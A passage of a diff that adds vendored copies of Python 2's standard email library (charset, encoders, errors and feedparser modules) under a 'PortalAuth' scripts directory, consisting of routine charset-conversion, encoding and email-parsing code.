module expose the following information about a character set:
|
||||
|
||||
input_charset: The initial character set specified. Common aliases
|
||||
are converted to their `official' email names (e.g. latin_1
|
||||
is converted to iso-8859-1). Defaults to 7-bit us-ascii.
|
||||
|
||||
header_encoding: If the character set must be encoded before it can be
|
||||
used in an email header, this attribute will be set to
|
||||
Charset.QP (for quoted-printable), Charset.BASE64 (for
|
||||
base64 encoding), or Charset.SHORTEST for the shortest of
|
||||
QP or BASE64 encoding. Otherwise, it will be None.
|
||||
|
||||
body_encoding: Same as header_encoding, but describes the encoding for the
|
||||
mail message's body, which indeed may be different than the
|
||||
header encoding. Charset.SHORTEST is not allowed for
|
||||
body_encoding.
|
||||
|
||||
output_charset: Some character sets must be converted before the can be
|
||||
used in email headers or bodies. If the input_charset is
|
||||
one of them, this attribute will contain the name of the
|
||||
charset output will be converted to. Otherwise, it will
|
||||
be None.
|
||||
|
||||
input_codec: The name of the Python codec used to convert the
|
||||
input_charset to Unicode. If no conversion codec is
|
||||
necessary, this attribute will be None.
|
||||
|
||||
output_codec: The name of the Python codec used to convert Unicode
|
||||
to the output_charset. If no conversion codec is necessary,
|
||||
this attribute will have the same value as the input_codec.
|
||||
"""
|
||||
def __init__(self, input_charset=DEFAULT_CHARSET):
|
||||
# RFC 2046, $4.1.2 says charsets are not case sensitive. We coerce to
|
||||
# unicode because its .lower() is locale insensitive. If the argument
|
||||
# is already a unicode, we leave it at that, but ensure that the
|
||||
# charset is ASCII, as the standard (RFC XXX) requires.
|
||||
try:
|
||||
if isinstance(input_charset, unicode):
|
||||
input_charset.encode('ascii')
|
||||
else:
|
||||
input_charset = unicode(input_charset, 'ascii')
|
||||
except UnicodeError:
|
||||
raise errors.CharsetError(input_charset)
|
||||
input_charset = input_charset.lower().encode('ascii')
|
||||
# Set the input charset after filtering through the aliases and/or codecs
|
||||
if not (input_charset in ALIASES or input_charset in CHARSETS):
|
||||
try:
|
||||
input_charset = codecs.lookup(input_charset).name
|
||||
except LookupError:
|
||||
pass
|
||||
self.input_charset = ALIASES.get(input_charset, input_charset)
|
||||
# We can try to guess which encoding and conversion to use by the
|
||||
# charset_map dictionary. Try that first, but let the user override
|
||||
# it.
|
||||
henc, benc, conv = CHARSETS.get(self.input_charset,
|
||||
(SHORTEST, BASE64, None))
|
||||
if not conv:
|
||||
conv = self.input_charset
|
||||
# Set the attributes, allowing the arguments to override the default.
|
||||
self.header_encoding = henc
|
||||
self.body_encoding = benc
|
||||
self.output_charset = ALIASES.get(conv, conv)
|
||||
# Now set the codecs. If one isn't defined for input_charset,
|
||||
# guess and try a Unicode codec with the same name as input_codec.
|
||||
self.input_codec = CODEC_MAP.get(self.input_charset,
|
||||
self.input_charset)
|
||||
self.output_codec = CODEC_MAP.get(self.output_charset,
|
||||
self.output_charset)
|
||||
|
||||
def __str__(self):
|
||||
return self.input_charset.lower()
|
||||
|
||||
__repr__ = __str__
|
||||
|
||||
def __eq__(self, other):
|
||||
return str(self) == str(other).lower()
|
||||
|
||||
def __ne__(self, other):
|
||||
return not self.__eq__(other)
|
||||
|
||||
def get_body_encoding(self):
|
||||
"""Return the content-transfer-encoding used for body encoding.
|
||||
|
||||
This is either the string `quoted-printable' or `base64' depending on
|
||||
the encoding used, or it is a function in which case you should call
|
||||
the function with a single argument, the Message object being
|
||||
encoded. The function should then set the Content-Transfer-Encoding
|
||||
header itself to whatever is appropriate.
|
||||
|
||||
Returns "quoted-printable" if self.body_encoding is QP.
|
||||
Returns "base64" if self.body_encoding is BASE64.
|
||||
Returns "7bit" otherwise.
|
||||
"""
|
||||
assert self.body_encoding != SHORTEST
|
||||
if self.body_encoding == QP:
|
||||
return 'quoted-printable'
|
||||
elif self.body_encoding == BASE64:
|
||||
return 'base64'
|
||||
else:
|
||||
return encode_7or8bit
|
||||
|
||||
def convert(self, s):
|
||||
"""Convert a string from the input_codec to the output_codec."""
|
||||
if self.input_codec != self.output_codec:
|
||||
return unicode(s, self.input_codec).encode(self.output_codec)
|
||||
else:
|
||||
return s
|
||||
|
||||
def to_splittable(self, s):
|
||||
"""Convert a possibly multibyte string to a safely splittable format.
|
||||
|
||||
Uses the input_codec to try and convert the string to Unicode, so it
|
||||
can be safely split on character boundaries (even for multibyte
|
||||
characters).
|
||||
|
||||
Returns the string as-is if it isn't known how to convert it to
|
||||
Unicode with the input_charset.
|
||||
|
||||
Characters that could not be converted to Unicode will be replaced
|
||||
with the Unicode replacement character U+FFFD.
|
||||
"""
|
||||
if isinstance(s, unicode) or self.input_codec is None:
|
||||
return s
|
||||
try:
|
||||
return unicode(s, self.input_codec, 'replace')
|
||||
except LookupError:
|
||||
# Input codec not installed on system, so return the original
|
||||
# string unchanged.
|
||||
return s
|
||||
|
||||
def from_splittable(self, ustr, to_output=True):
|
||||
"""Convert a splittable string back into an encoded string.
|
||||
|
||||
Uses the proper codec to try and convert the string from Unicode back
|
||||
into an encoded format. Return the string as-is if it is not Unicode,
|
||||
or if it could not be converted from Unicode.
|
||||
|
||||
Characters that could not be converted from Unicode will be replaced
|
||||
with an appropriate character (usually '?').
|
||||
|
||||
If to_output is True (the default), uses output_codec to convert to an
|
||||
encoded format. If to_output is False, uses input_codec.
|
||||
"""
|
||||
if to_output:
|
||||
codec = self.output_codec
|
||||
else:
|
||||
codec = self.input_codec
|
||||
if not isinstance(ustr, unicode) or codec is None:
|
||||
return ustr
|
||||
try:
|
||||
return ustr.encode(codec, 'replace')
|
||||
except LookupError:
|
||||
# Output codec not installed
|
||||
return ustr
|
||||
|
||||
def get_output_charset(self):
|
||||
"""Return the output character set.
|
||||
|
||||
This is self.output_charset if that is not None, otherwise it is
|
||||
self.input_charset.
|
||||
"""
|
||||
return self.output_charset or self.input_charset
|
||||
|
||||
def encoded_header_len(self, s):
|
||||
"""Return the length of the encoded header string."""
|
||||
cset = self.get_output_charset()
|
||||
# The len(s) of a 7bit encoding is len(s)
|
||||
if self.header_encoding == BASE64:
|
||||
return email.base64mime.base64_len(s) + len(cset) + MISC_LEN
|
||||
elif self.header_encoding == QP:
|
||||
return email.quoprimime.header_quopri_len(s) + len(cset) + MISC_LEN
|
||||
elif self.header_encoding == SHORTEST:
|
||||
lenb64 = email.base64mime.base64_len(s)
|
||||
lenqp = email.quoprimime.header_quopri_len(s)
|
||||
return min(lenb64, lenqp) + len(cset) + MISC_LEN
|
||||
else:
|
||||
return len(s)
|
||||
|
||||
def header_encode(self, s, convert=False):
|
||||
"""Header-encode a string, optionally converting it to output_charset.
|
||||
|
||||
If convert is True, the string will be converted from the input
|
||||
charset to the output charset automatically. This is not useful for
|
||||
multibyte character sets, which have line length issues (multibyte
|
||||
characters must be split on a character, not a byte boundary); use the
|
||||
high-level Header class to deal with these issues. convert defaults
|
||||
to False.
|
||||
|
||||
The type of encoding (base64 or quoted-printable) will be based on
|
||||
self.header_encoding.
|
||||
"""
|
||||
cset = self.get_output_charset()
|
||||
if convert:
|
||||
s = self.convert(s)
|
||||
# 7bit/8bit encodings return the string unchanged (modulo conversions)
|
||||
if self.header_encoding == BASE64:
|
||||
return email.base64mime.header_encode(s, cset)
|
||||
elif self.header_encoding == QP:
|
||||
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
|
||||
elif self.header_encoding == SHORTEST:
|
||||
lenb64 = email.base64mime.base64_len(s)
|
||||
lenqp = email.quoprimime.header_quopri_len(s)
|
||||
if lenb64 < lenqp:
|
||||
return email.base64mime.header_encode(s, cset)
|
||||
else:
|
||||
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
|
||||
else:
|
||||
return s
|
||||
|
||||
def body_encode(self, s, convert=True):
|
||||
"""Body-encode a string and convert it to output_charset.
|
||||
|
||||
If convert is True (the default), the string will be converted from
|
||||
the input charset to output charset automatically. Unlike
|
||||
header_encode(), there are no issues with byte boundaries and
|
||||
multibyte charsets in email bodies, so this is usually pretty safe.
|
||||
|
||||
The type of encoding (base64 or quoted-printable) will be based on
|
||||
self.body_encoding.
|
||||
"""
|
||||
if convert:
|
||||
s = self.convert(s)
|
||||
# 7bit/8bit encodings return the string unchanged (module conversions)
|
||||
if self.body_encoding is BASE64:
|
||||
return email.base64mime.body_encode(s)
|
||||
elif self.body_encoding is QP:
|
||||
return email.quoprimime.body_encode(s)
|
||||
else:
|
||||
return s
|
||||
BIN
PortalAuth/includes/scripts/libs/email/charset.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/charset.pyc
Executable file
Binary file not shown.
82
PortalAuth/includes/scripts/libs/email/encoders.py
Executable file
82
PortalAuth/includes/scripts/libs/email/encoders.py
Executable file
@@ -0,0 +1,82 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""Encodings and related functions."""
|
||||
|
||||
__all__ = [
|
||||
'encode_7or8bit',
|
||||
'encode_base64',
|
||||
'encode_noop',
|
||||
'encode_quopri',
|
||||
]
|
||||
|
||||
import base64
|
||||
|
||||
from quopri import encodestring as _encodestring
|
||||
|
||||
|
||||
|
||||
def _qencode(s):
|
||||
enc = _encodestring(s, quotetabs=True)
|
||||
# Must encode spaces, which quopri.encodestring() doesn't do
|
||||
return enc.replace(' ', '=20')
|
||||
|
||||
|
||||
def _bencode(s):
|
||||
# We can't quite use base64.encodestring() since it tacks on a "courtesy
|
||||
# newline". Blech!
|
||||
if not s:
|
||||
return s
|
||||
hasnewline = (s[-1] == '\n')
|
||||
value = base64.encodestring(s)
|
||||
if not hasnewline and value[-1] == '\n':
|
||||
return value[:-1]
|
||||
return value
|
||||
|
||||
|
||||
|
||||
def encode_base64(msg):
|
||||
"""Encode the message's payload in Base64.
|
||||
|
||||
Also, add an appropriate Content-Transfer-Encoding header.
|
||||
"""
|
||||
orig = msg.get_payload()
|
||||
encdata = _bencode(orig)
|
||||
msg.set_payload(encdata)
|
||||
msg['Content-Transfer-Encoding'] = 'base64'
|
||||
|
||||
|
||||
|
||||
def encode_quopri(msg):
|
||||
"""Encode the message's payload in quoted-printable.
|
||||
|
||||
Also, add an appropriate Content-Transfer-Encoding header.
|
||||
"""
|
||||
orig = msg.get_payload()
|
||||
encdata = _qencode(orig)
|
||||
msg.set_payload(encdata)
|
||||
msg['Content-Transfer-Encoding'] = 'quoted-printable'
|
||||
|
||||
|
||||
|
||||
def encode_7or8bit(msg):
|
||||
"""Set the Content-Transfer-Encoding header to 7bit or 8bit."""
|
||||
orig = msg.get_payload()
|
||||
if orig is None:
|
||||
# There's no payload. For backwards compatibility we use 7bit
|
||||
msg['Content-Transfer-Encoding'] = '7bit'
|
||||
return
|
||||
# We play a trick to make this go fast. If encoding to ASCII succeeds, we
|
||||
# know the data must be 7bit, otherwise treat it as 8bit.
|
||||
try:
|
||||
orig.encode('ascii')
|
||||
except UnicodeError:
|
||||
msg['Content-Transfer-Encoding'] = '8bit'
|
||||
else:
|
||||
msg['Content-Transfer-Encoding'] = '7bit'
|
||||
|
||||
|
||||
|
||||
def encode_noop(msg):
|
||||
"""Do nothing."""
|
||||
BIN
PortalAuth/includes/scripts/libs/email/encoders.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/encoders.pyc
Executable file
Binary file not shown.
57
PortalAuth/includes/scripts/libs/email/errors.py
Executable file
57
PortalAuth/includes/scripts/libs/email/errors.py
Executable file
@@ -0,0 +1,57 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""email package exception classes."""
|
||||
|
||||
|
||||
|
||||
class MessageError(Exception):
|
||||
"""Base class for errors in the email package."""
|
||||
|
||||
|
||||
class MessageParseError(MessageError):
|
||||
"""Base class for message parsing errors."""
|
||||
|
||||
|
||||
class HeaderParseError(MessageParseError):
|
||||
"""Error while parsing headers."""
|
||||
|
||||
|
||||
class BoundaryError(MessageParseError):
|
||||
"""Couldn't find terminating boundary."""
|
||||
|
||||
|
||||
class MultipartConversionError(MessageError, TypeError):
|
||||
"""Conversion to a multipart is prohibited."""
|
||||
|
||||
|
||||
class CharsetError(MessageError):
|
||||
"""An illegal charset was given."""
|
||||
|
||||
|
||||
|
||||
# These are parsing defects which the parser was able to work around.
|
||||
class MessageDefect:
|
||||
"""Base class for a message defect."""
|
||||
|
||||
def __init__(self, line=None):
|
||||
self.line = line
|
||||
|
||||
class NoBoundaryInMultipartDefect(MessageDefect):
|
||||
"""A message claimed to be a multipart but had no boundary parameter."""
|
||||
|
||||
class StartBoundaryNotFoundDefect(MessageDefect):
|
||||
"""The claimed start boundary was never found."""
|
||||
|
||||
class FirstHeaderLineIsContinuationDefect(MessageDefect):
|
||||
"""A message had a continuation line as its first header line."""
|
||||
|
||||
class MisplacedEnvelopeHeaderDefect(MessageDefect):
|
||||
"""A 'Unix-from' header was found in the middle of a header block."""
|
||||
|
||||
class MalformedHeaderDefect(MessageDefect):
|
||||
"""Found a header that was missing a colon, or was otherwise malformed."""
|
||||
|
||||
class MultipartInvariantViolationDefect(MessageDefect):
|
||||
"""A message claimed to be a multipart but no subparts were found."""
|
||||
BIN
PortalAuth/includes/scripts/libs/email/errors.pyc
Executable file
BIN
PortalAuth/includes/scripts/libs/email/errors.pyc
Executable file
Binary file not shown.
484
PortalAuth/includes/scripts/libs/email/feedparser.py
Executable file
484
PortalAuth/includes/scripts/libs/email/feedparser.py
Executable file
@@ -0,0 +1,484 @@
|
||||
# Copyright (C) 2004-2006 Python Software Foundation
|
||||
# Authors: Baxter, Wouters and Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""FeedParser - An email feed parser.
|
||||
|
||||
The feed parser implements an interface for incrementally parsing an email
|
||||
message, line by line. This has advantages for certain applications, such as
|
||||
those reading email messages off a socket.
|
||||
|
||||
FeedParser.feed() is the primary interface for pushing new data into the
|
||||
parser. It returns when there's nothing more it can do with the available
|
||||
data. When you have no more data to push into the parser, call .close().
|
||||
This completes the parsing and returns the root message object.
|
||||
|
||||
The other advantage of this parser is that it will never throw a parsing
|
||||
exception. Instead, when it finds something unexpected, it adds a 'defect' to
|
||||
the current message. Defects are just instances that live on the message
|
||||
object's .defects attribute.
|
||||
"""
|
||||
|
||||
__all__ = ['FeedParser']
|
||||
|
||||
import re
|
||||
|
||||
from email import errors
|
||||
from email import message
|
||||
|
||||
NLCRE = re.compile('\r\n|\r|\n')
|
||||
NLCRE_bol = re.compile('(\r\n|\r|\n)')
|
||||
NLCRE_eol = re.compile('(\r\n|\r|\n)\Z')
|
||||
NLCRE_crack = re.compile('(\r\n|\r|\n)')
|
||||
# RFC 2822 $3.6.8 Optional fields. ftext is %d33-57 / %d59-126, Any character
|
||||
# except controls, SP, and ":".
|
||||
headerRE = re.compile(r'^(From |[\041-\071\073-\176]{1,}:|[\t ])')
|
||||
EMPTYSTRING = ''
|
||||
NL = '\n'
|
||||
|
||||
NeedMoreData = object()
|
||||
|
||||
|
||||
|
||||
class BufferedSubFile(object):
|
||||
"""A file-ish object that can have new data loaded into it.
|
||||
|
||||
You can also push and pop line-matching predicates onto a stack. When the
|
||||
current predicate matches the current line, a false EOF response
|
||||
(i.e. empty string) is returned instead. This lets the parser adhere to a
|
||||
simple abstraction -- it parses until EOF closes the current message.
|
||||
"""
|
||||
def __init__(self):
|
||||
# The last partial line pushed into this object.
|
||||
self._partial = ''
|
||||
# The list of full, pushed lines, in reverse order
|
||||
self._lines = []
|
||||
# The stack of false-EOF checking predicates.
|
||||
self._eofstack = []
|
||||
# A flag indicating whether the file has been closed or not.
|
||||
self._closed = False
|
||||
|
||||
def push_eof_matcher(self, pred):
|
||||
self._eofstack.append(pred)
|
||||
|
||||
def pop_eof_matcher(self):
|
||||
return self._eofstack.pop()
|
||||
|
||||
def close(self):
|
||||
# Don't forget any trailing partial line.
|
||||
self._lines.append(self._partial)
|
||||
self._partial = ''
|
||||
self._closed = True
|
||||
|
||||
def readline(self):
|
||||
if not self._lines:
|
||||
if self._closed:
|
||||
return ''
|
||||
return NeedMoreData
|
||||
# Pop the line off the stack and see if it matches the current
|
||||
# false-EOF predicate.
|
||||
line = self._lines.pop()
|
||||
# RFC 2046, section 5.1.2 requires us to recognize outer level
|
||||
# boundaries at any level of inner nesting. Do this, but be sure it's
|
||||
# in the order of most to least nested.
|
||||
for ateof in self._eofstack[::-1]:
|
||||
if ateof(line):
|
||||
# We're at the false EOF. But push the last line back first.
|
||||
self._lines.append(line)
|
||||
return ''
|
||||
return line
|
||||
|
||||
def unreadline(self, line):
|
||||
# Let the consumer push a line back into the buffer.
|
||||
assert line is not NeedMoreData
|
||||
self._lines.append(line)
|
||||
|
||||
def push(self, data):
|
||||
"""Push some new data into this object."""
|
||||
# Handle any previous leftovers
|
||||
data, self._partial = self._partial + data, ''
|
||||
# Crack into lines, but preserve the newlines on the end of each
|
||||
parts = NLCRE_crack.split(data)
|
||||
# The *ahem* interesting behaviour of re.split when supplied grouping
|
||||
# parentheses is that the last element of the resulting list is the
|
||||
# data after the final RE. In the case of a NL/CR terminated string,
|
||||
# this is the empty string.
|
||||
self._partial = parts.pop()
|
||||
#GAN 29Mar09 bugs 1555570, 1721862 Confusion at 8K boundary ending with \r:
|
||||
# is there a \n to follow later?
|
||||
if not self._partial and parts and parts[-1].endswith('\r'):
|
||||
self._partial = parts.pop(-2)+parts.pop()
|
||||
# parts is a list of strings, alternating between the line contents
|
||||
# and the eol character(s). Gather up a list of lines after
|
||||
# re-attaching the newlines.
|
||||
lines = []
|
||||
for i in range(len(parts) // 2):
|
||||
lines.append(parts[i*2] + parts[i*2+1])
|
||||
self.pushlines(lines)
|
||||
|
||||
def pushlines(self, lines):
|
||||
# Reverse and insert at the front of the lines.
|
||||
self._lines[:0] = lines[::-1]
|
||||
|
||||
def is_closed(self):
|
||||
return self._closed
|
||||
|
||||
def __iter__(self):
|
||||
return self
|
||||
|
||||
def next(self):
|
||||
line = self.readline()
|
||||
if line == '':
|
||||
raise StopIteration
|
||||
return line
|
||||
|
||||
|
||||
|
||||
class FeedParser:
|
||||
"""A feed-style parser of email."""
|
||||
|
||||
def __init__(self, _factory=message.Message):
|
||||
"""_factory is called with no arguments to create a new message obj"""
|
||||
self._factory = _factory
|
||||
self._input = BufferedSubFile()
|
||||
self._msgstack = []
|
||||
self._parse = self._parsegen().next
|
||||
self._cur = None
|
||||
self._last = None
|
||||
self._headersonly = False
|
||||
|
||||
# Non-public interface for supporting Parser's headersonly flag
|
||||
def _set_headersonly(self):
|
||||
self._headersonly = True
|
||||
|
||||
def feed(self, data):
|
||||
"""Push more data into the parser."""
|
||||
self._input.push(data)
|
||||
self._call_parse()
|
||||
|
||||
def _call_parse(self):
|
||||
try:
|
||||
self._parse()
|
||||
except StopIteration:
|
||||
pass
|
||||
|
||||
def close(self):
|
||||
"""Parse all remaining data and return the root message object."""
|
||||
self._input.close()
|
||||
self._call_parse()
|
||||
root = self._pop_message()
|
||||
assert not self._msgstack
|
||||
# Look for final set of defects
|
||||
if root.get_content_maintype() == 'multipart' \
|
||||
and not root.is_multipart():
|
||||
root.defects.append(errors.MultipartInvariantViolationDefect())
|
||||
return root
|
||||
|
||||
def _new_message(self):
|
||||
msg = self._factory()
|
||||
if self._cur and self._cur.get_content_type() == 'multipart/digest':
|
||||
msg.set_default_type('message/rfc822')
|
||||
if self._msgstack:
|
||||
self._msgstack[-1].attach(msg)
|
||||
self._msgstack.append(msg)
|
||||
self._cur = msg
|
||||
self._last = msg
|
||||
|
||||
def _pop_message(self):
|
||||
retval = self._msgstack.pop()
|
||||
if self._msgstack:
|
||||
self._cur = self._msgstack[-1]
|
||||
else:
|
||||
self._cur = None
|
||||
return retval
|
||||
|
||||
def _parsegen(self):
|
||||
# Create a new message and start by parsing headers.
|
||||
self._new_message()
|
||||
headers = []
|
||||
# Collect the headers, searching for a line that doesn't match the RFC
|
||||
# 2822 header or continuation pattern (including an empty line).
|
||||
for line in self._input:
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
if not headerRE.match(line):
|
||||
# If we saw the RFC defined header/body separator
|
||||
# (i.e. newline), just throw it away. Otherwise the line is
|
||||
# part of the body so push it back.
|
||||
if not NLCRE.match(line):
|
||||
self._input.unreadline(line)
|
||||
break
|
||||
headers.append(line)
|
||||
# Done with the headers, so parse them and figure out what we're
|
||||
# supposed to see in the body of the message.
|
||||
self._parse_headers(headers)
|
||||
# Headers-only parsing is a backwards compatibility hack, which was
|
||||
# necessary in the older parser, which could throw errors. All
|
||||
# remaining lines in the input are thrown into the message body.
|
||||
if self._headersonly:
|
||||
lines = []
|
||||
while True:
|
||||
line = self._input.readline()
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
if line == '':
|
||||
break
|
||||
lines.append(line)
|
||||
self._cur.set_payload(EMPTYSTRING.join(lines))
|
||||
return
|
||||
if self._cur.get_content_type() == 'message/delivery-status':
|
||||
# message/delivery-status contains blocks of headers separated by
|
||||
# a blank line. We'll represent each header block as a separate
|
||||
# nested message object, but the processing is a bit different
|
||||
# than standard message/* types because there is no body for the
|
||||
# nested messages. A blank line separates the subparts.
|
||||
while True:
|
||||
self._input.push_eof_matcher(NLCRE.match)
|
||||
for retval in self._parsegen():
|
||||
if retval is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
break
|
||||
msg = self._pop_message()
|
||||
# We need to pop the EOF matcher in order to tell if we're at
|
||||
# the end of the current file, not the end of the last block
|
||||
# of message headers.
|
||||
self._input.pop_eof_matcher()
|
||||
# The input stream must be sitting at the newline or at the
|
||||
# EOF. We want to see if we're at the end of this subpart, so
|
||||
# first consume the blank line, then test the next line to see
|
||||
# if we're at this subpart's EOF.
|
||||
while True:
|
||||
line = self._input.readline()
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
break
|
||||
while True:
|
||||
line = self._input.readline()
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
break
|
||||
if line == '':
|
||||
break
|
||||
# Not at EOF so this is a line we're going to need.
|
||||
self._input.unreadline(line)
|
||||
return
|
||||
if self._cur.get_content_maintype() == 'message':
|
||||
# The message claims to be a message/* type, then what follows is
|
||||
# another RFC 2822 message.
|
||||
for retval in self._parsegen():
|
||||
if retval is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
break
|
||||
self._pop_message()
|
||||
return
|
||||
if self._cur.get_content_maintype() == 'multipart':
|
||||
boundary = self._cur.get_boundary()
|
||||
if boundary is None:
|
||||
# The message /claims/ to be a multipart but it has not
|
||||
# defined a boundary. That's a problem which we'll handle by
|
||||
# reading everything until the EOF and marking the message as
|
||||
# defective.
|
||||
self._cur.defects.append(errors.NoBoundaryInMultipartDefect())
|
||||
lines = []
|
||||
for line in self._input:
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
lines.append(line)
|
||||
self._cur.set_payload(EMPTYSTRING.join(lines))
|
||||
return
|
||||
# Create a line match predicate which matches the inter-part
|
||||
# boundary as well as the end-of-multipart boundary. Don't push
|
||||
# this onto the input stream until we've scanned past the
|
||||
# preamble.
|
||||
separator = '--' + boundary
|
||||
boundaryre = re.compile(
|
||||
'(?P<sep>' + re.escape(separator) +
|
||||
r')(?P<end>--)?(?P<ws>[ \t]*)(?P<linesep>\r\n|\r|\n)?$')
|
||||
capturing_preamble = True
|
||||
preamble = []
|
||||
linesep = False
|
||||
while True:
|
||||
line = self._input.readline()
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
if line == '':
|
||||
break
|
||||
mo = boundaryre.match(line)
|
||||
if mo:
|
||||
# If we're looking at the end boundary, we're done with
|
||||
# this multipart. If there was a newline at the end of
|
||||
# the closing boundary, then we need to initialize the
|
||||
# epilogue with the empty string (see below).
|
||||
if mo.group('end'):
|
||||
linesep = mo.group('linesep')
|
||||
break
|
||||
# We saw an inter-part boundary. Were we in the preamble?
|
||||
if capturing_preamble:
|
||||
if preamble:
|
||||
# According to RFC 2046, the last newline belongs
|
||||
# to the boundary.
|
||||
lastline = preamble[-1]
|
||||
eolmo = NLCRE_eol.search(lastline)
|
||||
if eolmo:
|
||||
preamble[-1] = lastline[:-len(eolmo.group(0))]
|
||||
self._cur.preamble = EMPTYSTRING.join(preamble)
|
||||
capturing_preamble = False
|
||||
self._input.unreadline(line)
|
||||
continue
|
||||
# We saw a boundary separating two parts. Consume any
|
||||
# multiple boundary lines that may be following. Our
|
||||
# interpretation of RFC 2046 BNF grammar does not produce
|
||||
# body parts within such double boundaries.
|
||||
while True:
|
||||
line = self._input.readline()
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
mo = boundaryre.match(line)
|
||||
if not mo:
|
||||
self._input.unreadline(line)
|
||||
break
|
||||
# Recurse to parse this subpart; the input stream points
|
||||
# at the subpart's first line.
|
||||
self._input.push_eof_matcher(boundaryre.match)
|
||||
for retval in self._parsegen():
|
||||
if retval is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
break
|
||||
# Because of RFC 2046, the newline preceding the boundary
|
||||
# separator actually belongs to the boundary, not the
|
||||
# previous subpart's payload (or epilogue if the previous
|
||||
# part is a multipart).
|
||||
if self._last.get_content_maintype() == 'multipart':
|
||||
epilogue = self._last.epilogue
|
||||
if epilogue == '':
|
||||
self._last.epilogue = None
|
||||
elif epilogue is not None:
|
||||
mo = NLCRE_eol.search(epilogue)
|
||||
if mo:
|
||||
end = len(mo.group(0))
|
||||
self._last.epilogue = epilogue[:-end]
|
||||
else:
|
||||
payload = self._last.get_payload()
|
||||
if isinstance(payload, basestring):
|
||||
mo = NLCRE_eol.search(payload)
|
||||
if mo:
|
||||
payload = payload[:-len(mo.group(0))]
|
||||
self._last.set_payload(payload)
|
||||
self._input.pop_eof_matcher()
|
||||
self._pop_message()
|
||||
# Set the multipart up for newline cleansing, which will
|
||||
# happen if we're in a nested multipart.
|
||||
self._last = self._cur
|
||||
else:
|
||||
# I think we must be in the preamble
|
||||
assert capturing_preamble
|
||||
preamble.append(line)
|
||||
# We've seen either the EOF or the end boundary. If we're still
|
||||
# capturing the preamble, we never saw the start boundary. Note
|
||||
# that as a defect and store the captured text as the payload.
|
||||
# Everything from here to the EOF is epilogue.
|
||||
if capturing_preamble:
|
||||
self._cur.defects.append(errors.StartBoundaryNotFoundDefect())
|
||||
self._cur.set_payload(EMPTYSTRING.join(preamble))
|
||||
epilogue = []
|
||||
for line in self._input:
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
self._cur.epilogue = EMPTYSTRING.join(epilogue)
|
||||
return
|
||||
# If the end boundary ended in a newline, we'll need to make sure
|
||||
# the epilogue isn't None
|
||||
if linesep:
|
||||
epilogue = ['']
|
||||
else:
|
||||
epilogue = []
|
||||
for line in self._input:
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
epilogue.append(line)
|
||||
# Any CRLF at the front of the epilogue is not technically part of
|
||||
# the epilogue. Also, watch out for an empty string epilogue,
|
||||
# which means a single newline.
|
||||
if epilogue:
|
||||
firstline = epilogue[0]
|
||||
bolmo = NLCRE_bol.match(firstline)
|
||||
if bolmo:
|
||||
epilogue[0] = firstline[len(bolmo.group(0)):]
|
||||
self._cur.epilogue = EMPTYSTRING.join(epilogue)
|
||||
return
|
||||
# Otherwise, it's some non-multipart type, so the entire rest of the
|
||||
# file contents becomes the payload.
|
||||
lines = []
|
||||
for line in self._input:
|
||||
if line is NeedMoreData:
|
||||
yield NeedMoreData
|
||||
continue
|
||||
lines.append(line)
|
||||
self._cur.set_payload(EMPTYSTRING.join(lines))
|
||||
|
||||
def _parse_headers(self, lines):
|
||||
# Passed a list of lines that make up the headers for the current msg
|
||||
lastheader = ''
|
||||
lastvalue = []
|
||||
for lineno, line in enumerate(lines):
|
||||
# Check for continuation
|
||||
if line[0] in ' \t':
|
||||
if not lastheader:
|
||||
# The first line of the headers was a continuation. This
|
||||
# is illegal, so let's note the defect, store the illegal
|
||||
# line, and ignore it for purposes of headers.
|
||||
defect = errors.FirstHeaderLineIsContinuationDefect(line)
|
||||
self._cur.defects.append(defect)
|
||||
continue
|
||||
lastvalue.append(line)
|
||||
continue
|
||||
if lastheader:
|
||||
# XXX reconsider the joining of folded lines
|
||||
lhdr = EMPTYSTRING.join(lastvalue)[:-1].rstrip('\r\n')
|
||||
self._cur[lastheader] = lhdr
|
||||
lastheader, lastvalue = '', []
|
||||
# Check for envelope header, i.e. unix-from
|
||||
if line.startswith('From '):
|
||||
if lineno == 0:
|
||||
# Strip off the trailing newline
|
||||
mo = NLCRE_eol.search(line)
|
||||
if mo:
|
||||
line = line[:-len(mo.group(0))]
|
||||
self._cur.set_unixfrom(line)
|
||||
continue
|
||||
elif lineno == len(lines) - 1:
|
||||
# Something looking like a unix-from at the end - it's
|
||||
# probably the first line of the body, so push back the
|
||||
# line and stop.
|
||||
self._input.unreadline(line)
|
||||
return
|
||||
else:
|
||||
# Weirdly placed unix-from line. Note this as a defect
|
||||
# and ignore it.
|
||||
defect = errors.MisplacedEnvelopeHeaderDefect(line)
|
||||
self._cur.defects.append(defect)
|
||||
continue
|
||||
# Split the line on the colon separating field name from value.
|
||||
i = line.find(':')
|
||||
if i < 0:
|
||||
defect = errors.MalformedHeaderDefect(line)
|
||||
self._cur.defects.append(defect)
|
||||
continue
|
||||
lastheader = line[:i]
|
||||
lastvalue = [line[i+1:].lstrip()]
|
||||
# Done with all the lines, so handle the last header.
|
||||
if lastheader:
|
||||
# XXX reconsider the joining of folded lines
|
||||
